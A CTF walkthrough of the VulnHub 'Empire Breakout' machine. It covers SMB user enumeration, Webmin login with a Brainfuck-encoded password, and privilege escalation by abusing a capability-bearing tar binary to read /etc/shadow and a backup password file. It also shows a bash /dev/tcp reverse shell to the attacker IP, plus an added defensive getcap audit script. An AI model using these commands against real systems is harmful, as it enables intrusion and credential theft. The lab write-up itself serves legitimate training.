Empire Breakout

Posted by axlfpe on 2025-05-21

Target VM: https://www.vulnhub.com/entry/hack-me-please-1,731/
Attacker IP: 192.168.108.50
Target IP: 192.168.108.131

1. Information Gathering

Kal ddddx ~ ❯ rustscan -a 192.168.108.131

Three open ports were found.

First, just open the site normally in a browser.

It is the Apache default page; let's look at the page source.

<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

Scrolling to the very bottom reveals a piece of "encrypted" information. It is actually a snippet written in the Brainfuck language, and this kind of disguise-as-encryption is easy to break. Decoded, it reads:

.2uqPEfj3D<P'a-3

Scanning the ports turned up nothing much; 139 and 455 are the Windows file sharing (SMB) ports. Let's try 10000 and 20000.

These turn out to be two different login systems, one for Webmin and one for users. Tried "universal" passwords (SQL-injection login-bypass strings) and weak passwords, and checked the page source; no luck.

Since we already have a user's password, the next task should be finding the username.

Kal ddddx ~ ❯ smbclient -L \\192.168.108.131 -N                                                             at 20:02:14
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.108.131 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

The attempt errors out. Looking it up: Kali's smbclient uses SMB1 by default, while most target servers now disable SMB1 by default (because of its security problems, e.g. EternalBlue).
Fix: pass --option to smbclient to force a newer protocol:

Kal ddddx ~ ❯ smbclient -L //192.168.108.131 -N --option='client min protocol=SMB2' --option='client max protocol=SMB3'

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
SMB1 disabled -- no workgroup available

Two shares are found; try to enumerate them, starting with print$.

Kal ddddx ~ ❯ smbclient //192.168.108.131/print$ -N --option='client min protocol=SMB2' --option='client max protocol=SMB3'
tree connect failed: NT_STATUS_ACCESS_DENIED

Anonymous (-N) access to the print$ share is denied, which means the target Samba service has access control enabled on it.
Try IPC$ next.

Kal ddddx ~ ❯ smbclient //192.168.108.131/IPC$ -N --option='client min protocol=SMB2' --option='client max protocol=SMB3'
Try "help" to get a list of possible commands.
smb: \>

The connection succeeds. Next, use IPC$ for enumeration and information gathering: rpcclient can connect to IPC$ to enumerate information, or enum4linux-ng can automate the collection. enum4linux-ng is used here.

It automatically attempts a null-session login and collects:

  • SMB version
  • Hostname, workgroup and domain name
  • User list
  • Shares
  • OS information

Note: enum4linux-ng returned nothing here, but enum4linux did.

Kal ddddx ~ ❯ enum4linux 192.168.108.131                                                                    at 20:23:08
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 20 20:27:18 2025

=========================================( Target Information )=========================================

Target ........... 192.168.108.131
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

==========================( Enumerating Workgroup/Domain on 192.168.108.131 )==========================

[+] Got domain/workgroup name: WORKGROUP

==============================( Nbtstat Information for 192.168.108.131 )==============================

Looking up status of 192.168.108.131
BREAKOUT <00> - B <ACTIVE> Workstation Service
BREAKOUT <03> - B <ACTIVE> Messenger Service
BREAKOUT <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

==================================( Session Check on 192.168.108.131 )==================================

[+] Server 192.168.108.131 allows sessions using username '', password ''

===============================( Getting domain SID for 192.168.108.131 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

=================================( OS information on 192.168.108.131 )=================================

[E] Can't get OS info with smbclient

[+] Got OS info for 192.168.108.131 from srvinfo:
BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
platform_id : 500
os version : 6.1
server type : 0x809a03

======================================( Users on 192.168.108.131 )======================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

================================( Share Enumeration on 192.168.108.131 )================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.108.131 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.108.131

//192.168.108.131/print$ Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.108.131/IPC$ Mapping: N/A Listing: N/A Writing: N/A

==========================( Password Policy Information for 192.168.108.131 )==========================

[+] Attaching to 192.168.108.131 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] BREAKOUT
[+] Builtin

[+] Password Info for Domain: BREAKOUT

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

=====================================( Groups on 192.168.108.131 )=====================================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

=================( Users on 192.168.108.131 via RID cycling (RIDS: 500-550,1000-1050) )=================

[I] Found new SID:
S-1-22-1

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\cyber (Local User)

[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''

S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)

==============================( Getting printer info for 192.168.108.131 )==============================

No printers returned.

enum4linux complete on Tue May 20 20:27:32 2025

To summarise:

User enumeration succeeded (RID cycling):

  • cyber (Unix local user, UID 1000)
  • nobody (default Samba user)
  • None (a group name; looks like the default / no-group entry)

This means the system has at least one valid local user, cyber.

We now have a user and a password; log in on port 20000.

Login succeeded; after some digging, the first flag was found.

[cyber@breakout ~]$ ls
tar
user.txt
[cyber@breakout ~]$ cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

On to privilege escalation. First look at the second file: it belongs to root. In other words, inside an ordinary user's home directory there is a copy of the tar binary that is owned by root and executable.

It is not a SUID binary, so take another approach and check its file capabilities.

This tar binary has the Linux capability cap_dac_read_search set, with the flags ep (effective + permitted).
This is a privileged Linux capability that lets a process bypass the filesystem's read/execute permission checks, effectively allowing it to read or search directories and file contents that do not belong to it.
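From the defender's side, the thing to catch is exactly this: a capability-bearing binary sitting outside the system directories. The following Python script is an added example, not code from the original post; it parses getcap -r output (a constructed sample, in both libcap output styles) and flags dangerous capabilities that are actually effective or permitted. The DANGEROUS table and TRUSTED_PREFIXES are my own choices, not a standard list.

```python
"""Audit getcap output for dangerous file capabilities (added example, not from the
original post); input is constructed getcap -r output in both libcap output styles."""
import re

# Capabilities that let a binary bypass DAC or reach root-equivalent power.
DANGEROUS = {
    "cap_dac_read_search": "read any file and traverse any directory",
    "cap_dac_override": "bypass all file permission checks",
    "cap_setuid": "switch to any UID, including 0",
    "cap_sys_admin": "broad administrative operations",
}
# Directories where capability-bearing binaries are normally expected.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")
# A clause looks like "cap_a,cap_b=ep" (libcap >= 2.41) or "cap_a,cap_b+ep" (older).
CLAUSE_RE = re.compile(r"([a-z_,]+)[=+]([a-z]*)")

def parse_getcap_line(line):
    """Return (path, {cap: set(flags)}) for one getcap line, or None if it is not one."""
    line = line.strip()
    if "cap_" not in line:
        return None
    path, _, rest = line.partition(" ")
    caps = {}
    for names, flags in CLAUSE_RE.findall(rest.lstrip("= ")):
        for name in names.split(","):
            caps[name] = set(flags)
    return path, caps

def audit_getcap(output):
    """List (path, cap, reason, outside_trusted_dirs) for every dangerous capability that
    is actually granted, i.e. effective (e) or permitted (p); inheritable-only is skipped."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        for cap, flags in caps.items():
            if cap in DANGEROUS and flags & {"e", "p"}:
                outside = not path.startswith(TRUSTED_PREFIXES)
                findings.append((path, cap, DANGEROUS[cap], outside))
    return findings

# Constructed sample modelled on the box: a normal ping beside the rogue tar copy.
SAMPLE = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/home/cyber/tar cap_dac_read_search=ep
"""
```

On a live host, feed it the output of `getcap -r / 2>/dev/null`; any finding with outside_trusted_dirs set deserves a look.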

Try to archive /etc/shadow out with it:

[cyber@breakout ~]$ ./tar -cf shadow.tar /etc/shadow
./tar: Removing leading `/' from member names
[cyber@breakout ~]$ tar
tar
tarcat
[cyber@breakout ~]$ tar -xf shadow.tar
[cyber@breakout ~]$ cat etc/shadow
root:$y$j9T$M3BDdkxYOlVM6ECoqwUFs.$Wyz40CNLlZCFN6Xltv9AAZAJY5S3aDvLXp0tmJKlk6A:18919:0:99999:7:::
daemon:*:18919:0:99999:7:::
bin:*:18919:0:99999:7:::
sys:*:18919:0:99999:7:::
sync:*:18919:0:99999:7:::
games:*:18919:0:99999:7:::
man:*:18919:0:99999:7:::
lp:*:18919:0:99999:7:::
mail:*:18919:0:99999:7:::
news:*:18919:0:99999:7:::
uucp:*:18919:0:99999:7:::
proxy:*:18919:0:99999:7:::
www-data:*:18919:0:99999:7:::
backup:*:18919:0:99999:7:::
list:*:18919:0:99999:7:::
irc:*:18919:0:99999:7:::
gnats:*:18919:0:99999:7:::
nobody:*:18919:0:99999:7:::
_apt:*:18919:0:99999:7:::
systemd-timesync:*:18919:0:99999:7:::
systemd-network:*:18919:0:99999:7:::
systemd-resolve:*:18919:0:99999:7:::
messagebus:*:18919:0:99999:7:::
cyber:$y$j9T$x6sDj5S/H0RH4IGhi0c6x0$mIPyCIactTA3/gxTaI7zctfCt2.EOGXTOW4X9efAVW4:18919:0:99999:7:::
systemd-coredump:!*:18919::::::

This is a yescrypt password hash (starting with $y$), a stronger hashing scheme adopted by default in modern Linux (e.g. shadow >= v4.8).

hashcat cannot yet reliably crack yescrypt, so john was used here, but it could not crack it either.

A walkthrough says there is a password backup file under /var/backups.

[cyber@breakout ~]$ cd /var/backups/
[cyber@breakout backups]$ ls -al
total 480
drwxr-xr-x 2 root root 4096 May 20 06:25 .
drwxr-xr-x 14 root root 4096 Oct 19 2021 ..
-rw-r--r-- 1 root root 40960 May 20 06:25 alternatives.tar.0
-rw-r--r-- 1 root root 12732 Oct 19 2021 apt.extended_states.0
-rw-r--r-- 1 root root 0 May 20 06:25 dpkg.arch.0
-rw-r--r-- 1 root root 186 Oct 19 2021 dpkg.diversions.0
-rw-r--r-- 1 root root 135 Oct 19 2021 dpkg.statoverride.0
-rw-r--r-- 1 root root 413488 Oct 19 2021 dpkg.status.0
-rw------- 1 root root 17 Oct 20 2021 .old_pass.bak
[cyber@breakout backups]$ cd ~
[cyber@breakout ~]$ ./tar -cvf pass.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
/var/backups/.old_pass.bak
[cyber@breakout ~]$ tar -xvf pass.tar
var/backups/.old_pass.bak
[cyber@breakout ~]$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h

With the root password in hand, try logging in, but the moment the password is entered it gets interrupted, so a direct login fails.

[cyber@breakout ~]$ su
Password: su: Authentication failure
[cyber@breakout ~]$ su
Password: su: Authentication failure
[cyber@breakout ~]$ su
Password: su: Authentication failure
[cyber@breakout ~]$ su
Password: su: Authentication failur

Bounce a reverse shell back to Kali and try logging in again; this time the last flag is obtained.

[cyber@breakout ~]$ bash -i >& /dev/tcp/192.168.108.50/2000 0>&1
Kal ddddx ~ ❯ pwncat-cs -l -p 2001                                                                          at 14:42:57
[15:01:00] Welcome to pwncat 🐈! __main__.py:164
[15:01:02] received connection from 192.168.108.131:56124 bind.py:84
[15:01:02] 0.0.0.0:2001: normalizing shell path manager.py:957
192.168.108.131:56124: registered new host w/ db manager.py:957
(local) pwncat$
(remote) cyber@breakout:/home/cyber$ su
Password:
root@breakout:/home/cyber# ls
12 etc pass.tar shadow.tar tar user.txt var
root@breakout:/home/cyber# cd ~
root@breakout:~# ls
rOOt.txt
root@breakout:~# cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
Author: Icex64 & Empire Cybersecurity
root@breakout:~#
